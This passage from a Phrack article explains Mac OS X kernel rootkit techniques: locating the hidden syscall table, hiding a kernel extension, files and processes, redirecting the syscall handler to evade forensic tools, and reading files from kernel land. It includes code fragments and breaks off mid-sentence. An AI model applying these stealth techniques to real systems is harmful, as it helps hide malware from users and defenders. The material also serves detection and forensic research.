Title : Revisiting Mac OS X Kernel Rootkits

Author : fG!

==Phrack Inc.== Volume 0x0f, Issue 0x45, Phile #0x07 of 0x10 |=-----------------------------------------------------------------------=| |=-------------=[ Revisiting Mac OS X Kernel Rootkits ]=-----------------=| |=-----------------------------------------------------------------------=| |=---------------------=[ fG! <phrack@put.as> ]=-------------------------=| |=-----------------------------------------------------------------------=| --[ Table of contents 1 - Introduction 2 - The classic problems 2.1 - What is new since Tiger 2.2 - Sysent table discovery techniques 2.3 - Hiding the kext 2.4 - Hiding files 2.5 - Hiding processes 2.6 - Modifying the syscall handler 3 - Reading the filesystem from kernel land 3.1 - Real short overview of VFS 3.2 - The easy way - Apple loves rootkit authors! 3.3 - The more complex way 3.4 - Solving kernel symbols 4 - Executing userland binaries from the kernel 4.1 - Writing from kernel memory into userland processes 4.2 - Abusing (again!) dyld to inject and run code 4.3 - Finding the place to execute the injection 4.4 - Ideas are great, execution is everything 4.5 - The dynamic library 4.6 - Hiding our tracks 5 - Revisiting userland<->kernel communication 5.1 - Character devices and ioctl 5.2 - Kernel control KPI 5.3 - Ideas for our own alternative channels 6 - Anti-forensics 6.1 - Cheap tricks to reduce our footprint 6.2 - Attacking DTrace and other instrumentation features 6.2.1 - FSEvents 6.2.2 - kdebug 6.2.3 - TrustedBSD 6.2.4 - Auditing - Basic Security Module 6.2.5 - DTrace 6.2.5.1 - syscall provider 6.2.5.2 - fbt provider 6.3 - AV-Monster II 6.4 - Bypassing Little Snitch 6.5 - Zombie rootkits 7 - Caveats & Detection 8 - Final words 9 - References 10 - T3h l337 c0d3z --[ 1 - Introduction In Phrack #66, ghalen and wowie wrote about interesting OS X kernel rootkit techniques. That article is almost 4 years old and 4 major OS X releases behind. Today Mountain Lion is king and many of the presented techniques are not valid anymore - Apple reacted and closed those "holes". One hand is enough to count the number of known rootkits targetting Apple's OS. The most recent public release was Rubylin [2], a simple rootkit that works with Lion (v10.7) (if you can read Korean there is a very interesting memory forensics analysis at [3]). The commercial spyware industry recently leaked DaVinci (aka OS.X/Crisis), a user/kernel rootkit with some interesting features and flaws [4]. There are rumours about FinFisher but no OS X leak happened yet. Everything else is too old and outdated. The main goal of this article is to update public knowledge and introduce some "new" techniques so both offensive and defensive sides can improve. It is focused on the current version at the time of this writing, Mountain Lion, v10.8.2. The defensive knowledge and available tools are still poor. I hope this article motivates others to invest time and resources to improve this scenario. It is quite certain that the offensive knowledge is significantly ahead. I tried to make this article as complete as possible but there is so much to work to be done that it is a never-ending story. Some of the proposed solutions can be improved or implemented in different and/or better ways. You are encouraged to improve or develop new approaches and of course publish them. I also like to learn from others ;-) I hope you enjoy this (long) journey. fG! --[ 2 - The classic problems This section starts by introducing important changes made since Tiger. Then it discusses the old sysent retrieval techniques and their problems, and presents a solution compatible with past, current, and future OS X versions. It continues with improvements to classic rootkit features - hide and avoid (easy) detection. It must be noticed that these were developed before the in-kernel symbol resolution technique to be presented later, so they might appear a bit unsophisticated. I think there is value in this knowledge and that is why it is described under the original conditions. ----[ 2.1 - What is new since Tiger The easiest and many favourite's spot to hook the system calls is the sysent table - just replace a pointer and we are set. Apple has been improving the defence of that "castle" by hiding the sysent table symbol and moving its location. In Mountain Lion the table is now located in read-only memory (not a big problem anyway). Syscall hijacking techniques like these can be easily found with basic analysis tools, but they are still interesting and useful for other purposes as to be shown later. Another important change is that the kernel module list (kmod_info_t) is deprecated. Before, the kernel extension rootkit could be easily hidden from kextstat by manipulating this list. Now we must patch an I/O Kit OSArray class called sLoadedKexts to hide from tools that list loaded kernel extensions. Snare was the first to publicly discuss this issue, and the commercial spyware OS.X/Crisis the first (afaik) to implement it. Its technique will be later described. Mountain Lion finally introduced kernel ASLR. It might be harder to develop and execute the necessary exploit to install the rootkit but after that it is (mostly) business as usual. Up to Snow Leopard, Apple removed the symbol table from the kernel space so there was no easy way to solve non-exported symbols inside the kernel extension or I/O Kit driver. This was changed in Lion by leaving the full __LINKEDIT segment in kernel memory but marked as pageable. Snare shows this in one of his posts [5] and rubilyn rootkit uses it. Beware that the formula they use has a small problem - it assumes that the symbol table is located at the beginning of __LINKEDIT. This is true in Lion but not in Mountain Lion. I will show you how a solution that is stable, simple, and compatible with all OS X versions. Too good to be true! :-) ----[ 2.2 - Sysent table discovery techniques As described in Phrack 66 article, Landon Fuller [6] was first to come public with a technique to solve the removal of exported sysent symbol. His technique is based on the distance between the (still) exported nsysent symbol (the number of entries in the sysent table, aka, number of syscalls) and sysent. The problem with this approach is that Apple can move the location of sysent between releases - offsets will change and the rootkit will fail and expose itself. Not acceptable! Lets illustrate this with an example, starting with Mountain Lion 10.8.2: $ nm /mach_kernel | grep nsysent ffffff8000839818 D _nsysent The location of sysent can be found by disassembling the kernel and using one of the three functions that reference it: - unix_syscall - unix_syscall64 - unix_syscall_return For 10.8.2 the sysent pointer will be located at 0xFFFFFF80008000D0 and the table located at 0xFFFFFF8000855840. Landon's formula does not apply here. In Lion 10.7.5 we have: $ nm mach_kernel_10_7_5 | grep nsysent ffffff8000846ed8 D _nsysent And sysent located at 0xFFFFFF8000842A40. This confirms Apple moving around the pointer between different releases. Notice that all previous values are from kernel at disk so no kernel ASLR slide is included. The slide value will be disclosed whenever it is being used in the examples. Another technique is described in The Mac Hacker's Handbook [7], released in 2009 and targeting Leopard. On page 332 there is a code snippet that searches memory for "something that has the same structure as the sysent table.". The starting search point is the nsysent symbol, increasing the memory pointer to lookup and match sysent array elements. That code snippet does not work with Snow Leopard because sysent array is located before nsysent symbol. It must be modified to support specific versions and releases. These different examples demonstrate that Apple changes sysent location between releases. A stable rootkit requires an universal technique. The second technique can be adapted to cover all cases. First we would scan memory addresses above nsysent and then below if initial search failed. If nsysent also stops being exported we would need to base the search in another symbol and continue the cat & mouse game. The reference symbol problem can be easily solved using a feature of x86 systems, the interrupt descriptor table (IDT). The IDT "is used by the processor to determine the correct response to interrupts and exceptions." [8]. The traditional implementation of syscalls is done via interrupt 80. The response to this interrupt will be executed by a kernel function pointed to by the IDT. IDT's location can be obtained using the asm instruction "sidt" (store interrupt descriptor table register). It returns the table location so the next step is to find out the address of the interrupt 80 handler. Once we have the interrupt 80 handler address we can find out the base address of the kernel. Kernel ASLR does not matter here because the handler address is always a valid kernel code location - we are dynamically querying the system and not using fixed addresses. To find the kernel base address is just a matter of searching memory back for the magic value of the Mach-O header - 0xfeedfacf (64 bits) or 0xfeedface (32 bits). One (curious) property of kernel ASLR implementation is that memory addresses in kernel and kexts Mach-O headers already contain the ASLR slide, something that does not happen in userland ASLR'ed binaries. The header in userland binaries is never updated so it is not synced with the address where the binary is loaded at. The next step is to process the Mach-O headers and find out where the __DATA segment is located. The reason for this is that the sysent table is located in there - we need to extract segment's start address and boundaries. Now it is just a matter of searching memory for something that matches the sysent table. Are there any performance problems doing things like this? The sysent location is found in less than a second even on a 5 year old Core 2 Duo Macbook Pro. The performance impact can be considered meaningless. This method was applied successfully when the first Mountain Lion developer preview became available and still works up to 10.8.2. You can find its implementation in the included source code at the end. A userland version that uses /dev/kmem to extract the same information is available at [9]. What is the difference against using any other exported symbol instead of all the trouble with the interrupt handler? Honestly, it is just a matter of personal preference and technical "prowess". A symbol that breaks compatibility if removed could be used instead with very low risk of Apple changing it. Later, we will need to use at least one KPI so almost any symbol from it can be used as search's starting point. Another solution is to use one MSR register involved in the SYSCALL instruction. A good candidate is the MSR register number 0xC0000082 (MSR_IA32_LSTAR), which contains the SYSCALL entrypoint. One way to get its value in 64 bits is the following (ripped from XNU): #define rdmsr(msr,lo,hi) \ __asm__ volatile("rdmsr" : "=a" (lo), "=d" (hi) : "c" (msr)) static inline uint64_t rdmsr64(uint32_t msr) { uint32_t lo=0, hi=0; rdmsr(msr, lo, hi); return (((uint64_t)hi) << 32) | ((uint64_t)lo); } Calling rdmsr64(0xC0000082) will return the kernel address that will handle 64 bits syscalls via the SYSCALL interface. The register number 0x176 (MSR_IA32_SYSENTER_EIP) is the one we are interested at for 32 bits systems - it is used for 32 bits syscalls via SYSENTER. These are just a few possibilities to retrieve a valid address inside the running kernel and then find the start address of the kernel Mach-O header and sysent location. The location of the Mach-O header will be useful to compute the kernel ASLR value (the slide is stored in a kernel variable but its symbol is not exported!). ----[ 2.3 - Hiding the kext As mentioned before, the kernel module list is deprecated in favor of a IOKit OSArray class called sLoadedKexts. This introduces a new problem: how to find its location since we are talking about IOKIT C++. The OS.X/Crisis spyware implemented an interesting solution. It leverages a simple IOKit method that references sLoadedKexts to find the object location. The method is OSKext::lookupKextWithLoadTag [libkern/c++/OSKext.cpp]: OSKext * OSKext::lookupKextWithLoadTag(uint32_t aTag) { OSKext * foundKext = NULL; // returned uint32_t count, i; IORecursiveLockLock(sKextLock); count = sLoadedKexts->getCount(); <- use this location, for example for (i = 0; i < count; i++) { OSKext * thisKext = OSDynamicCast(OSKext, sLoadedKexts->getObject(i)); if (thisKext->getLoadTag() == aTag) { foundKext = thisKext; foundKext->retain(); goto finish; } } finish: IORecursiveLockUnlock(sKextLock); return foundKext; } There is no symbol resolution feature inside the Crisis kernel rootkit - the symbol (__ZN6OSKext21lookupKextWithLoadTagEj) is solved by the userland component and sent to the rootkit module via a sysctl. The function that hides the rootkit starts by searching for the 0xE8 byte corresponding to the IORecursiveLockLock() call. All searches are done using hex patterns. It then uses fixed offsets to compute the location of the array and modify it. The provided source code reimplements this technique. The search could be made easier (and portable?) by disassembling this method. The good news is that we can have a x86/x64 disassembler inside a kernel extension thanks to diStorm [19] (other libraries probably work but I'm a fan of diStorm, in particular after the introduction of the decompose interface). To statically compile diStorm just import the source and include files into your rootkit project. You also need to define SUPPORT_64BIT_OFFSET or uncomment it at config.h. Assuming we have no method to find kernel symbols inside the rootkit (this will be later developed), we can use the disassembling engine to try to find the functions or methods that we are interested in. The whole __text section can be disassembled and searched for instruction patterns that are hopefully more stable than hex patterns. Testing this approach I was able to find the method referenced above with a precision of 100% or 50%. The different rates depend on how strict are the search parameters due to some differences between compiler output in kernel versions. I'm talking about the number of calls, jmps, jnz, jae, which have small variations between some versions (compiler upgrades, settings, etc). The performance is amazing - it takes 1 second to disassemble and search the whole kernel using a high-end Intel i7 cpu. The main problem of Crisis's approach is that it depends on fixed offsets inside the OSArray class. If anything changes it will break compatibility and potentially crash or expose the rootkit. Disassembling the kernel is useful to find patterns and leveraging them in different cases. It is not perfect and does not solve all our problems but it is another helpful tool. ----[ 2.4 - Hiding files Files are hidden by modifying (at least) three different syscalls: getdirentries, getdirentriesattr, and getdirentries64. Nothing new and thoroughly described before. What usually happens is that only the filename is matched - that is the information directly available from the structures available in those three syscalls. This means that a filename to be hidden will be matched in any folder, something that can raise suspicion if a common filename is used. With a small effort we can do better and learn something in the process. Let's find out how to recover additional information to match specific file or folder locations. Target function is getdirentries64 but the concepts apply to the other two. The structure that is commonly manipulated is: struct direntry { __uint64_t d_ino; /* file number of entry */ __uint64_t d_seekoff; /* seek offset (optional, used by servers) */ __uint16_t d_reclen; /* length of this record */ __uint16_t d_namlen; /* length of string in d_name */ __uint8_t d_type; /* file type, see below */ char d_name[__DARWIN_MAXPATHLEN]; /*entry name (up to MAXPATHLEN bytes)*/ } The match is done against the field d_name, which only contains the current file or folder without the full path. This is the reason why most implementations only match the file anywhere in the filesystem. Luckily for us, all syscalls functions prototypes contain the proc structure as the first parameter. It contains enough information to match the full pathname. struct proc { (...) struct filedesc *p_fd; /* Ptr to open files structure. */ (...) } struct filedesc { struct fileproc **fd_ofiles; /* file structures for open files */ char *fd_ofileflags; /* per-process open file flags */ struct vnode *fd_cdir; /* current directory */ struct vnode *fd_rdir; /* root directory */ int fd_nfiles; /* number of open files allocated */ int fd_lastfile; /* high-water mark of fd_ofiles */ (...) }; For example, to display all the open files by an arbitrary process calling getdirentries64, we could use the following code: void show_all_openfiles(struct proc *p) { // lock proc structure else we are asking for trouble (*proc_fdlock)(p); struct filedesc *fd = p->p_fd; if (fd != NULL) { // for some reason fd_nfiles is not useful for this int lastfile = fd->fd_lastfile; // show all open files for this proc for (int count = 0; count < lastfile; count++) { // fd_ofiles is an array of fileproc that contains file structs // for all open files struct fileproc *fp = fd->fd_ofiles[count]; // we are only interested in files so match fg_type field if (fp != NULL && fp->f_fglob != NULL && fp->f_fglob->fg_type == DTYPE_VNODE) { // lock the vnode - fg_data cast depends on fg_type // type is vnode so we know fg_data will point to a vnode_t (*vnode_lock)((struct vnode*)fp->f_fglob->fg_data); struct vnode *vn = (struct vnode*)fp->f_fglob->fg_data; if (vn->v_name != NULL) { printf("[%d] Filename: %s

", count, vn->v_name); } (*vnode_unlock)((struct vnode*)fp->f_fglob->fg_data); } } } (*proc_fdunlock)(p); } The files listed by this function are not the files we want to hide but the files opened by the binary calling this syscall. This information can be used, for example, to find the path that a "ls" command is trying to list. The full path can be extracted manually by iterating over the vnodes of each file, or by using a KPI function (vn_getpath). To build the path from vnodes, first we retrieve the vnode structure correspondent to the file and then iterate over up to the filesystem root - each vnode has a reference to its parent vnode. struct vnode { (...) const char *v_name; /* name component of the vnode */ vnode_t v_parent; /* pointer to parent vnode */ (...) } Each path component can be sequentially matched until v_parent == NULLVP, which means the filesystem root. If path matches what we want to hide then it is a matter of removing that entry from direntry array as usual. To find the folder or file being listed we can use the following trick, which seems to hold true: int lastfile = main_fd->fd_lastfile; // lastfile has the information we are looking for struct fileproc *last_fp = main_fd->fd_ofiles[lastfile]; The only word of caution is when shell expansion is involved. In this case last file entry name will be a "ttys" and we need to iterate fd_ofiles array looking for the previous element to "ttys" - it is not lastfile-1. It looks complicated but it is not and just a matter of looking up the necessary information in kernel structures. The proc structure is extremely rich and a good starting point for many hacks. The biggest problem is being frequently changed between major OS X versions. With so many kernel functions available it is almost certain there is already a function that will avoid us to build the path as described above. That function is vn_getpath() from bsd/sys/vnode.h. /*! @function vn_getpath @abstract Construct the path to a vnode. @discussion Paths to vnodes are not always straightforward: a file with multiple hard-links will have multiple pathnames, and it is sometimes impossible to determine a vnode's full path. vn_getpath() will not enter the filesystem. @param vp The vnode whose path to obtain. @param pathbuf Destination for pathname; should be of size MAXPATHLEN @param len Destination for length of resulting path string. Result will include NULL-terminator in count--that is, "len" will be strlen(pathbuf) + 1. @return 0 for success or an error code. */ int vn_getpath(struct vnode *vp, char *pathbuf, int *len); We still need to retrieve a vnode from the proc structure to use this function. To find the vnode we can use the lastfile trick to find the target path, retrieve its vnode and then use this function to get the full path. A better solution is to hide your data inside other data files that can't be easily checksum'ed. Sqlite3 databases come to my mind [35]. ----[ 2.5 - Hiding processes The traditional way to hide processes is to remove them from the process list maintained by the kernel. When an application requests the process list, the rootkit intercepts and modifies the request. In this case, only the results are modified and the underlying structures are still intact. A rootkit detection tool can access those structures and compare with the results. Another possibility is to remove the processes from the process list. This time a tool that is based on those structures information will not be able to detect the inconsistency because there is none (regarding only the proc list, because there is data in other structures that can be used to signal inconsistencies). Due to OS X design, things are a bit more fun (or complicated) because the BSD layer runs on top of XNU layer. The basic process units are Mach tasks and threads and there's a one-on-one mapping between BSD processes and Mach tasks. The task is just a container and Mach threads are the units that execute code. What matters for this case is that there is an additional list where inconsistencies can be detected - the Mach tasks list. Using an ascii version of nofate's diagram found at [3]: proc <-> proc <-> proc <-> ... ^ ^ ^ BSD --|---------|---------|------------------ v v v Mach tasks <-> tasks <-> tasks <-> ... The version with a hidden process at the BSD layer: proc <------------> proc <-> ... ^ ^ ^ BSD --|---------|---------|------------------ v v v Mach tasks <-> tasks <-> tasks <-> ... Each BSD process has reference to the Mach tasks list via a void pointer and vice-versa. Transversing both lists can detect the inconsistency described above and most certainly flag an installed rootkit (it is possible to have a Mach task without a corresponding BSD process). struct proc { (...) void *task; /* corresponding task (static) */ (...) } struct task { (...) void *bsd_info; /* the corresponding proc_t */ (...) } The (not so new) lesson to extract from this is that there many points to be used for detecting inconsistencies in the system. These are hard to hide if the goal is to hide one or more rogue processes. A much better solution is to piggyback into normal processes, where detection is a bit harder - it can be a normal process with an extra thread running for example. The piggyback solution will be used later to run userland commands from the kernel. ----[ 2.6 - Modifying the syscall handler A common technique to hide modifications to syscall table is to make a copy and modify the syscall handler to point to this new one. Rootkit detection utils that just verify the *legit* table are unable to detect it. There's nothing new about this technique although I have never seen it in use in OS X. It is a good opportunity to describe how to implement it. The interrupt 0x80 is handled by the assembly function idt64_unix_scall [osfmk/x86_64/idt64.s]. The IDT table definition [osfmk/x86_64/idt_table.h] confirms this and can be runtime verified by querying the IDT and extracting the address of int80 handler. USER_TRAP_SPC(0x80,idt64_unix_scall) Follow the idt64_unix_scall assembler code. The switch to C happens when unix_syscall[64] function is called, both for interrupt 0x80 and sysenter/systrap system calls. This code path opens many opportunities to change pointers, or install trampolines and redirect code to rootkit's implementation. One such possibility is to change the table pointer inside unix_syscall[64]. This is sample code from the 64 bits version: (...) code = regs->rax & SYSCALL_NUMBER_MASK; DEBUG_KPRINT_SYSCALL_UNIX( "unix_syscall64: code=%d(%s) rip=%llx

", code, syscallnames[code >= NUM_SYSENT ? 63 : code], regs->isf.rip); callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code]; uargp = (void *)(®s->rdi); (...) AUDIT_SYSCALL_ENTER(code, p, uthread); error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0])); AUDIT_SYSCALL_EXIT(code, p, uthread, error); (...) Disassembly output (here I renamed memory references in IDA since they have no symbols associated): loc_FFFFFF80005E169C: 4C 03 2D 2D EA 21 00 add r13, cs:sysent 4C 3B 2D 26 EA 21 00 cmp r13, cs:sysent 74 0B jz short loc_FFFFFF80005E16B7 The sysent reference is to: __DATA:__got:FFFFFF80008000D0 40 58 85 00 80 FF FF FF sysent dq offset sysent_table To directly find the location of sysent in the __got section is very easy. Find out the location of sysent table using one of the section 2 techniques (or some other) and then search the __got section for that address (to find the location and boundaries of __got section we just need to read kernel's Mach-O header). The easiest way to redirect sysent is to modify that pointer to our modified copy. A (memory) forensic tool that (only) searches for and lookups the original sysent table will fail to detect this and the next trick. For example, Volafox v0.8 is vulnerable. Volatility's Mac version at the time of writing has yet no sysent plugin available. Another way is to modify the code reference to __got section and instead point it to somewhere else. This is very easy to implement with diStorm's assistance. Disassemble the unix_syscall[64] functions and lookup for references to __got address. The instructions that need to be matched are ADD and CMP (this assumption appears to hold always true). To calculate the RIP target address, diStorm has a helper macro called INSTRUCTION_GET_RIP_TARGET(). If the RIP address matches the __got address the offset can be updated. Calculate the offset to the address that contains the pointer to the new table and update it at the instruction that referenced the old __got pointer. One last (important!) detail. RIP addressing uses a 32 bits offset, which appears to be enough to reference the new sysent (dynamically or statically allocated) in most cases. This might not always be true - from my experience the distance is very near the signed int limit. One way to make this safer is to put the pointer in kernel's memory space. This can be alignment space, Mach-O header (for the lulz!), or somewhere else (it is just a data pointer so no need for exec permission). --[ 3 - Reading the filesystem from kernel land Now let's get going with the fun stuff that opens the door to even funnier stuff! One of the annoying obstacles that Apple introduced against development of rootkits is the lack of kernel's full __LINKEDIT segment up to Snow Leopard. Useful symbols for rootkit development are also not exported. No one said rootkit development was easy - fun but not always easy. Possible solutions are to solve the symbols from userland, and pattern search from the kext - this one easily susceptible to failure due to changing patterns in kernel versions and compilers. For example, OS.X/Crisis spyware adopts a mixed approach. Most symbols are solved from the userland agent and communicated thru a character device to the rootkit, but sLoadedKexts is solved with byte search - starting point is still a symbol solved from userland. The easiest solution to this problem is to read the kernel file (/mach_kernel) from the rootkit and process the symbol table, as it is done from userland. The extracted addresses need to be fixed with the kernel ASLR slide but that is easily bypassed as described in section 2.2. As far as I know no publicly known OS X rootkit ever implemented arbitrary filesystem read, and probably very few to none in other platforms (TDSS being the most famous in Windows). There is some kind of myth about the difficulty of implementing this or something else that made rootkits developers avoid it. I must confess I was influenced by that "myth" and never bothered to give it a try before this article. In practice the implementation is extremely easy! Sometimes you just need to be in the right mood and give it a try. Two methods will be shown, one very easy based on exported symbols (and a copy of a very stable private extern kernel function), and another a bit more complex that requires some unexported symbols. Both are based in VFS - the obvious and easiest way to achieve our goal. Other functions can be used so many variations are possible. That is left open for you to explore, I still have a lot to write about in this paper :-) ----[ 3.1 - Real short overview of VFS The Virtual-Filesystem Interface was introduced in 4.4BSD and first implemented by Sun Microsystems. Before this innovation file entries directly referenced filesystem inodes. This method does not scale well if there's more than a filesystem type. VFS is an additional extensible object-oriented layer that introduces an abstraction of the underlying filesystem, making it easy to support multiple filesystems. Instead of inodes there are vnodes. There is no need to deal with the intricacies of multiple filesystems - we can use the VFS related functions and let the kernel do the filesystem operations "dirtywork". The most interesting VFS related structures to our purposes are: - struct filedesc: defined at bsd/sys/filedesc.h, represents the open files in a process. - struct fileproc: defined at bsd/sys/file_internal.h, represents each open file. - struct fileglob: defined at bsd/sys/file_internal.h, contains all the information associated to a file, including vnode and supported filesystem operations. - struct vnode: defined at bsd/sys/vnode_internal.h. Detailed references about the design and implementation can be found at [20], [14] and [13]. ----[ 3.2 - The easy way - Apple loves rootkit authors! The first piece of information that we need is the vnode of the target file we want to read. We already seen in section 2.4 that this information is available in proc_t structure but we can follow an easier path! One suitable function is vnode_lookup() (available in BSD KPI). It is defined at bsd/vfs/vfs_subr.c in XNU source code, and well documented at bsd/sys/vnode.h include: /*! @function vnode_lookup @abstract Convert a path into a vnode. @discussion This routine is a thin wrapper around xnu-internal lookup routines; if successful, it returns with an iocount held on the resulting vnode which must be dropped with vnode_put(). @param path Path to look up. @param flags VNODE_LOOKUP_NOFOLLOW: do not follow symbolic links. VNODE_LOOKUP_NOCROSSMOUNT: do not cross mount points. @return Results 0 for success or an error code. */ errno_t vnode_lookup(const char *, int, vnode_t *, vfs_context_t); The arguments are the path for the target file, search flags, a vnode_t pointer for output and the vfs context for the current thread (or kernel context). The vfs context can be obtained using the function vfs_context_current() but it is only available in the Unsupported KPI - subject to whatever Apple wants to do with it so not stable enough for our purposes. In practice the vfs context is not a problem because Apple (or BSD's original code) took good care of us. Let me show you why with kernel's implementation of vnode_lookup(): errno_t vnode_lookup(const char *path, int flags, vnode_t *vpp, vfs_context_t ctx) { struct nameidata nd; int error; u_int32_t ndflags = 0; if (ctx == NULL) { /* XXX technically an error */ ctx = vfs_context_current(); // <- thank you! :-) } (...) } Apple's love means that we just need a simple operation to retrieve kernel's vnode: #include <sys/vnode.h> int error = 0; vnode_t kernel_vnode = NULLVP; error = vnode_lookup("/mach_kernel", 0, &kernel_vnode, NULL); One important detail is that vnode_lookup() will increase the iocount on the target vnode (in case you missed above note from vnode_lookup). We must release it using vnode_put() when we do not need it anymore (after reading or writing what we want). This function is also available in the BSD KPI. Having kernel's vnode information we can finally read its contents from the rootkit. To do that we can use the VNOP_READ() function - documented and declared at bsd/sys/vnode_if.h. /*! @function VNOP_READ @abstract Call down to a filesystem to read file data. @discussion VNOP_READ() is where the hard work of of the read() system call happens. The filesystem may use the buffer cache, the cluster layer, or an alternative method to get its data; uio routines will be used to see that data is copied to the correct virtual address in the correct address space and will update its uio argument to indicate how much data has been moved. @param vp The vnode to read from. @param uio Description of request, including file offset, amount of data requested, destination address for data, and whether that destination is in kernel or user space. @param ctx Context against which to authenticate read request. @return 0 for success or a filesystem-specific error. VNOP_READ() can return success even if less data was read than originally requested; returning an error value should indicate that something actually went wrong. */ extern errno_t VNOP_READ(vnode_t, struct uio *, int, vfs_context_t); The last missing piece is an uio structure. To create that buffer we can use three other functions: uio_create(), uio_createwithbuffer() and uio_addiov(). Two are available in BSD KPIs - uio_create and uio_addiov. The other one, uio_createwithbuffer is private extern and used by uio_create. We can rip its implementation into our rootkit code from XNU source file bsd/kern/kern_subr.c. It's simple and stable enough to make this possible (never modified in all latest OS X versions). Once again we can pass NULL to the ctx argument - the implementation takes care of it for us as in vnode_lookup(). An example how to create the required structure to hold a 4kbytes page: char data_buffer[PAGE_SIZE_64]; uio_t uio = NULL; uio = uio_create(1, 0, UIO_SYSSPACE, UIO_READ); error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64); The same example using uio_createwithbuffer: char data_buffer[PAGE_SIZE_64]; uio_t uio = NULL; char uio_buf[UIO_SIZEOF(1)]; uio = uio_createwithbuffer(1, 0, UIO_SYSSPACE, UIO_READ, &uio_buf[0], sizeof(uio_buf)); error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64); First create the uio buffer, and then add it else it can't be used. The data buffer can be a statically allocated buffer (as above) or dynamically allocated using _MALLOC() or other available kernel variant. Having the uio buffer created the last step is to execute the read: error = VNOP_READ(kernel_vode, uio, 0, NULL); If successful, the buffer will contain the first page (4096 bytes) of /mach_kernel OS X kernel read into data_buffer. A good implementation reference of this process is the kernel function dqfileopen() [bsd/vfs/vfs_quota.c]. ----[ 3.3 - The more complex way This second approach was in fact how I started to explore this problem and before I learnt about vnode_lookup(). It is a good backup method but the learning experience and some techniques used to obtain some information are the interesting bits here. Its biggest inconvenience is that it requires the unexported symbol VNOP_LOOKUP(). This function requires diferent arguments but has the same functionality as vnode_lookup() - to lookup the vnode of a file or directory. Documentation can be found at bsd/sys/vnode_if.h. /*! @function VNOP_LOOKUP @abstract Call down to a filesystem to look for a directory entry by name. @discussion VNOP_LOOKUP is the key pathway through which VFS asks a filesystem to find a file. The vnode should be returned with an iocount to be dropped by the caller. A VNOP_LOOKUP() calldown can come without a preceding VNOP_OPEN(). @param dvp Directory in which to look up file. @param vpp Destination for found vnode. @param cnp Structure describing filename to find, reason for lookup, and various other data. @param ctx Context against which to authenticate lookup request. @return 0 for success or a filesystem-specific error. */ #ifdef XNU_KERNEL_PRIVATE extern errno_t VNOP_LOOKUP(vnode_t, vnode_t *, struct componentname *, vfs_context_t); #endif /* XNU_KERNEL_PRIVATE */ The first argument is the vnode of the directory where the target file is located. It is a kind of a chicken and egg problem because we do not have that information - we want it! Do not fear, this information can be extracted from somewhere else. As previously described, the proc structure contains the field p_fd - pointer to open files structure (struct filedesc). The filedesc structure has two interesting fields for our purposes: 1) fd_ofiles - an array of file structures for open files. 2) fd_cdir - vnode structure of current directory. There is also fd_rdir, which is the vnode of root directory but from my tests it is usually NULL. The proc structure is a doubly-linked list - we can "walk" around it and retrieve information of any process. In OS X, the kernel is just another Mach task with PID 0 and a corresponding proc entry - before Leopard we could access kernel task via task_for_pid(0), which allowed DKOM (direct kernel object manipulation). The mach_kernel file is located at the root directory /. The proposed procedure is to traverse the proc structure and find pid 0 (field p_pid). When found, the field fd_cdir will contain what we need - the vnode for the root directory. Next problem: how to access the proc structure. There is a symbol called allproc that contains a pointer to it but it is not exported anymore. We need an alternative way! Two solutions: complicated and straightforward. Recalling what was already described in section 2.4. Kernel's implementation of syscall functions has a struct proc * as first parameter. Using open() as example: open(struct proc *p, struct open_args *uap, int *retval) What we can do is to temporarily (or not) hijack a syscall via sysent table and get a reference to any proc_t. Since it is a doubly-linked list we can traverse it and find PID 0. When found we can extract the vnode pointer for current directory and that is it. The kernel does not keep /mach_kernel open so the field fd_ofiles is not useful. Luckly for us the fd_cdir is populated with the information we need - vnode of root directory /. The kernel knowledgeable reader knows there is no need for all this mess to retrieve a proc_t structure. There is a BSD KPI function that solves the problem with a single call, proc_find(). Its prototype is: proc_t proc_find(int pid) Kernel is just another task with PID 0, so just execute proc_find(0) and get the required structure pointer. This will increase the reference count and must be released using proc_rele(). Very easy, right? :-) Once again we need a vfs context and this time we need to supply it. While researching I used a hardcoded function pointer to vfs_context_current() but there is a better function that I found out while writing this section. It is vfs_context_create(), available in BSD KPI. /*! @function vfs_context_create @abstract Create a new vfs_context_t with appropriate references held. @discussion The context must be released with vfs_context_rele() when no longer in use. @param ctx Context to copy, or NULL to use information from running thread. @return The new context, or NULL in the event of failure. */ vfs_context_t vfs_context_create(vfs_context_t); We can use this function to create a new context and pass it to VNOP_LOOKUP(). The next step is to create a struct componentname [bsd/sys/vnode.h]. struct componentname { // Arguments to lookup. uint32_t cn_nameiop; /* lookup operation */ uint32_t cn_flags; /* flags (see below) */ void *cn_reserved1; /* use vfs_context_t */ void *cn_reserved2; /* use vfs_context_t */ // Shared between lookup and commit routines. char *cn_pnbuf; /* pathname buffer */ int cn_pnlen; /* length of allocated buffer */ char *cn_nameptr; /* pointer to looked up name */ int cn_namelen; /* length of looked up component */ uint32_t cn_hash; /* hash value of looked up name */ uint32_t cn_consume; /* chars to consume in lookup() */ }; A small example to lookup /mach_kernel: struct componentname cnp; char tmpname[] = "mach_kernel"; bzero(&cnp, sizeof(cnp)); cnp.cn_nameiop = LOOKUP; cnp.cn_flags = ISLASTCN; cnp.cn_reserved1 = vfs_context_create(NULL); cnp.cn_pnbuf = tmpname; cnp.cn_pnlen = sizeof(tmpname); cnp.cn_nameptr = cnp.cn_pnbuf; cnp.cn_namelen = (int)strlen(tmpname); // <- add NULL ? Now we are ready to call VNOP_LOOKUP() and use the returned vnode information to execute VNOP_READ() as in section 3.1 (do not forget to create first the UIO buffer). Last but not least, there is another function we can (ab)use to read files - vn_rdwr(). It was this function that triggered my curiosity about this process while reading about the execution flow of a Mach-O binary. The parameters it requires can be retrieved or created with the techniques above described or others you might come up with. Feel free to implement it and discover alternative ways to read the files (there are more!). Writing is not harder than reading. Just browse the source files mentioned in this section and the functions you need will be obvious. You can apply the techniques here described to fill the required parameters. ----[ 3.4 - Solving kernel symbols Snare on his blog post [5] explains in detail how to solve the kernel symbols. The only difference is that instead of reading directly from kernel memory we have the information in temporary buffers with data read from the filesystem. The proposed workflow is: 1) Read the first page of /mach_kernel, which contains the Mach-O header. 2) Process the Mach-O header and retrieve the following information: - From __TEXT segment: vmaddr field (for ASLR slide computation). - From __LINKEDIT segment: fileoff and filesize (so we can read the segment). - From LC_SYMTAB command: symoff, nsyms, stroff, strsize. Refer to [10] for more information about Mach-O file format. 3) Allocate buffer and read the whole 